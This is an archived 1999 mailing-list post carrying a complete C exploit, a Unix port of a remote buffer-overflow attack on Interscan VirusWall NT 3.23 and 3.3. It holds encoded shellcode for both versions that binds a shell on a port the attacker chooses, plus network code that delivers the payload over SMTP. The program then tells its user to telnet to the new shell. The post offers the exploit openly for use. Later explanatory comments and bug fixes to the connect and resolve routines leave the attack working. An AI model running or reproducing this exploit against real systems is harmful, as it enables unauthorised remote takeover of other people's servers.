
vwxploit.c unix port


From: scut () NB IN-BERLIN DE (Sebastian)
Date: Mon, 8 Nov 1999 13:21:43 +0100


Hi:)

This is just another unix port of dark spyrit's excellent exploits :) keep
up the good work ! :-)

ciao,
scut / team teso
[http://teso.scene.at/]

--
- scut () nb in-berlin de - http://nb.in-berlin.de/scut/ -  - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet  --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------
--- nuclear arrival weapon spy agent remain undercover, hi echelon ----------


/* Interscan VirusWall 3.23/3.3 remote
 * by dark spyrit <dspyrit () beavuh org>
 * quick unix port by team teso (http://teso.scene.at/).
 *
 * further information at http://www.beavuh.org.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


/* local functions
 */
/* Print the command-line synopsis to stdout and exit(EXIT_FAILURE); never returns. */
void                    usage (void);
/* Resolve a dotted quad or host name to an IPv4 address in network byte order.
 * Returns 0 on failure; note that 0 is also what "0.0.0.0" resolves to, so the
 * sentinel is ambiguous for that one input. */
unsigned long int       net_resolve (char *host);
/* Open a TCP connection to server:port, waiting at most `sec` seconds.
 * Fills *cs with the peer address.  Returns the connected descriptor, or -1
 * with errno set on most failures (ETIMEDOUT when the wait expires). */
int                     net_connect (struct sockaddr_in *cs, char *server,
        unsigned short int port, int sec);

/* shellcode by dark spyrit
 */
/* Number of bytes of sploit_323 that main() actually sends.  The count is
 * kept explicitly (rather than derived with strlen()) because the array
 * contains an embedded NUL byte near its end, and main() depends on the
 * layout being fixed: it overwrites the 2-byte port field at offset 1282.
 * By count, the string literal below holds exactly 1314 bytes before its
 * terminator, so the constant and the literal agree. */
unsigned long   sploit_323_len = 1314;
unsigned char   sploit_323[] =
        "\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb"
        "\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf"
        "\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33"
        "\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9"
        "\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51"
        "\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2"
        "\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42"
        "\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0"
        "\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34"
        "\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33"
        "\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10"
        "\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33"
        "\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48"
        "\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad"
        "\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57"
        "\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89"
        "\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01"
        "\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40"
        "\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8"
        "\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc"
        "\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4"
        "\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33"
        "\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77"
        "\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50"
        "\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0"
        "\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8"
        "\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04"
        "\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56"
        "\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb"
        "\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5"
        "\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9"
        "\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9"
        "\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc"
        "\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6"
        "\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc"
        "\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde"
        "\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce"
        "\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8"
        "\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99"
        "\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99"
        "\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2"
        "\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed"
        "\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc"
        "\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99"
        "\xff\xff"      /* 16 bit remote port number */
        "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
        "\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff"
        "\x60\x45\x42\x00\x0d\x0a";

/* Number of bytes of sploit_33 that main() actually sends.  As with the
 * 3.23 payload the count is explicit because the array contains an embedded
 * NUL, and main() overwrites the 2-byte port field at offset 762.  By count,
 * the literal below holds 795 bytes: its last piece, "\x0d\x0ah", ends in a
 * stray 'h' (the escape is "\x0a" followed by a literal h).  That byte lies
 * past this length and is therefore never transmitted; it looks like a typo
 * rather than intended data. */
unsigned long   sploit_33_len = 794;
unsigned char   sploit_33[] =
        "\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b"
        "\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33"
        "\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b"
        "\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90"
        "\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32"
        "\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80"
        "\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac"
        "\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b"
        "\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75"
        "\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab"
        "\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50"
        "\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57"
        "\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0"
        "\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad"
        "\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff"
        "\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33"
        "\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06"
        "\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c"
        "\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50"
        "\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff"
        "\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53"
        "\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8"
        "\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5"
        "\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0"
        "\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56"
        "\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0"
        "\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57"
        "\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff"
        "\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff"
        "\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57"
        "\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda"
        "\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc"
        "\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6"
        "\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa"
        "\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8"
        "\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4"
        "\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8"
        "\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc"
        "\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5"
        "\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed"
        "\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda"
        "\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb"
        "\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8"
        "\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb"
        "\xfc\xfa\xef\x99\x9b\x99"
        "\xff\xff"      /* sploit port number */
        "\x99\x99\x99\x99"
        "\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7"
        "\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00"
        "\x0d\x0ah";


void
usage (void)
{
        /* Print the command-line synopsis to stdout and terminate the
         * process with EXIT_FAILURE.  Never returns. */
        static const char help[] =
                "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n"
                "by dark spyrit <dspyrit () beavuh org>\n"
                "quick unix port by team teso\n\n"
                "usage: vwxploit <host> <port> <port to bind shell> <version>\n"
                "eg - vwxploit host.com 25 1234 3.23\n";

        fputs (help, stdout);
        exit (EXIT_FAILURE);
}

int
main (int argc, char **argv)
{
        /* Program entry point.  argv: <host> <port> <port to bind shell>
         * <version>; anything else goes to usage(), which exits.  Picks a
         * payload by version string, patches the requested port into it,
         * delivers it over one TCP connection and exits.  Errors are
         * reported through perror()/stderr; the exit status is
         * EXIT_SUCCESS only when the send path ran to completion. */
        /* NOTE(review): this local shadows socket(2).  Harmless here,
         * since main() never calls that function, but easy to misread. */
        int                     socket;
        /* payload to send, and the address of its 2-byte port field */
        unsigned char           *shellcode;
        unsigned char           *sh_port_offset;
        char                    *server;
        unsigned short int      port_dest, port_shell;
        /* explicit byte count: both payloads contain embedded NUL bytes,
         * so strlen() would stop early and sizeof would count too much */
        size_t                  sh_len;
        struct sockaddr_in      sa;

        if (argc != 5)
                usage ();

        server = argv[1];
        /* atoi() reports no errors: non-numeric input becomes 0 (rejected
         * below) and values above 65535 are silently truncated to 16 bits */
        port_dest = atoi (argv[2]);
        port_shell = atoi (argv[3]);
        if (port_dest == 0 || port_shell == 0)
                usage ();

        /* the version string selects the payload, its declared length and
         * the fixed offset of the port field inside it; the offsets must
         * stay in step with the array literals above */
        if (strcmp (argv[4], "3.23") == 0) {
                shellcode = sploit_323;
                sh_len = sploit_323_len;
                sh_port_offset = sploit_323 + 1282;
        } else if (strcmp (argv[4], "3.3") == 0) {
                shellcode = sploit_33;
                sh_len = sploit_33_len;
                sh_port_offset = sploit_33 + 762;
        } else {
                fprintf (stderr, "unsupported version\n");
                exit (EXIT_FAILURE);
        }

        /* the port is stored XORed with 0x9999, high byte first; the
         * (char) casts are no-ops because only the low byte of each
         * expression survives the store into an unsigned char */
        port_shell ^= 0x9999;
        *sh_port_offset = (char) ((port_shell >> 8) & 0xff);
        *(sh_port_offset + 1) = (char) (port_shell & 0xff);

        /* 45-second connect timeout; net_connect() leaves errno set on
         * most failures (not on a resolver failure), so perror() is
         * usually informative.  A return of 0 is treated as failure too. */
        socket = net_connect (&sa, server, port_dest, 45);
        if (socket <= 0) {
                perror ("net_connect");
                exit (EXIT_FAILURE);
        }

        /* NOTE(review): the return value of write() is ignored, so a short
         * or failed write is still reported as success below; sleep(1)
         * gives the peer time to consume the data before close() */
        write (socket, shellcode, sh_len);
        sleep (1);
        close (socket);

        /* argv[3] is re-parsed here rather than reusing port_shell, which
         * was XORed above and no longer holds the original number */
        printf ("data send, try \"telnet %s %d\" now\n",
                argv[1], atoi (argv[3]));

        exit (EXIT_SUCCESS);
}

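unsigned long int
net_resolve (char *host)
{
        /* Resolve `host` (dotted quad or DNS name) to an IPv4 address in
         * network byte order.  Returns 0 when resolution fails; callers
         * treat 0 as the failure sentinel, so "0.0.0.0" is indistinguishable
         * from an error (pre-existing contract, kept for compatibility).
         *
         * Fixes relative to the original:
         *  - inet_addr() returns in_addr_t (an unsigned 32-bit value).  The
         *    original stored it in a `long` and compared with -1, which on
         *    LP64 never matches: host names were never looked up, and an
         *    unparseable string was returned as 0xffffffff (255.255.255.255)
         *    instead of failing.
         *  - the hostent branch read sizeof(unsigned long) bytes out of the
         *    4-byte h_addr through a cast: an out-of-bounds, possibly
         *    misaligned read.
         * getaddrinfo() handles numeric and symbolic input alike and owns
         * the result buffer, which is released before returning. */
        struct addrinfo         hints;
        struct addrinfo         *res = NULL;
        struct sockaddr_in      sin;

        if (host == NULL || *host == '\0')
                return (0);

        memset (&hints, 0, sizeof hints);
        hints.ai_family = AF_INET;       /* caller stores into sockaddr_in */
        hints.ai_socktype = SOCK_STREAM;

        if (getaddrinfo (host, NULL, &hints, &res) != 0 || res == NULL)
                return (0);

        /* copy out instead of casting and dereferencing ai_addr: keeps the
         * access aligned and free of aliasing problems */
        if (res->ai_addr == NULL || res->ai_addrlen < sizeof sin) {
                freeaddrinfo (res);
                return (0);
        }
        memcpy (&sin, res->ai_addr, sizeof sin);
        freeaddrinfo (res);

        return ((unsigned long int) sin.sin_addr.s_addr);
}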


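int
net_connect (struct sockaddr_in *cs, char *server,
        unsigned short int port, int sec)
{
        /* Open a TCP connection to server:port, waiting at most `sec`
         * seconds for the non-blocking connect to complete.  *cs is filled
         * with the peer address as a side effect.  Returns the connected
         * descriptor, restored to blocking mode, or -1 with errno set:
         * ETIMEDOUT when the wait expires, the pending connect(2) error
         * (e.g. ECONNREFUSED) when the peer rejects, or the failing
         * syscall's errno otherwise.  A resolver failure is the one case
         * where errno is not meaningful, because net_resolve() reports no
         * cause.
         *
         * Fixes relative to the original: every failure path now closes the
         * socket (select/getsockopt/SO_ERROR/fcntl failures leaked it),
         * SO_ERROR is consulted whenever the descriptor becomes ready
         * instead of only when it is both readable and writable (a
         * writable-only failure fell through and returned the fd), the
         * getsockopt length is a socklen_t, an interrupted select is
         * restarted, and a descriptor too large for fd_set is rejected
         * rather than passed to FD_SET (undefined behaviour). */
        int             n, error, saved_errno;
        int             flags = 0;
        int             fd;
        socklen_t       len;
        struct timeval  tv;
        fd_set          rset, wset;

        cs->sin_family = AF_INET;
        cs->sin_port = htons (port);

        /* resolve before creating the socket: nothing to clean up if it fails */
        cs->sin_addr.s_addr = net_resolve (server);
        if (cs->sin_addr.s_addr == 0)
                return (-1);

        fd = socket (AF_INET, SOCK_STREAM, 0);
        if (fd == -1)
                return (-1);
        if (fd >= FD_SETSIZE) {
                errno = EMFILE;
                goto fail;
        }

        flags = fcntl (fd, F_GETFL, 0);
        if (flags == -1)
                goto fail;
        if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
                goto fail;

        n = connect (fd, (struct sockaddr *) cs, sizeof *cs);
        if (n == 0)
                goto done;              /* completed immediately */
        if (errno != EINPROGRESS)
                goto fail;

        /* wait for the connect to finish or the timeout to elapse; a signal
         * restarts the wait with the full timeout, so `sec` is a lower bound */
        do {
                FD_ZERO (&rset);
                FD_ZERO (&wset);
                FD_SET (fd, &rset);
                FD_SET (fd, &wset);
                tv.tv_sec = sec;
                tv.tv_usec = 0;
                n = select (fd + 1, &rset, &wset, NULL, &tv);
        } while (n == -1 && errno == EINTR);
        if (n == -1)
                goto fail;
        if (n == 0) {
                errno = ETIMEDOUT;
                goto fail;
        }
        if (!FD_ISSET (fd, &rset) && !FD_ISSET (fd, &wset))
                goto fail;              /* n > 0 without our fd: should not happen */

        /* readiness alone does not distinguish success from failure;
         * the pending error is reported through SO_ERROR */
        error = 0;
        len = sizeof error;
        if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) == -1)
                goto fail;
        if (error != 0) {
                errno = error;
                goto fail;
        }

done:
        /* hand back a blocking socket, as the caller expects for write(2) */
        if (fcntl (fd, F_SETFL, flags) == -1)
                goto fail;
        return (fd);

fail:
        /* close(2) may clobber errno; preserve the cause for the caller */
        saved_errno = errno;
        close (fd);
        errno = saved_errno;
        return (-1);
}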



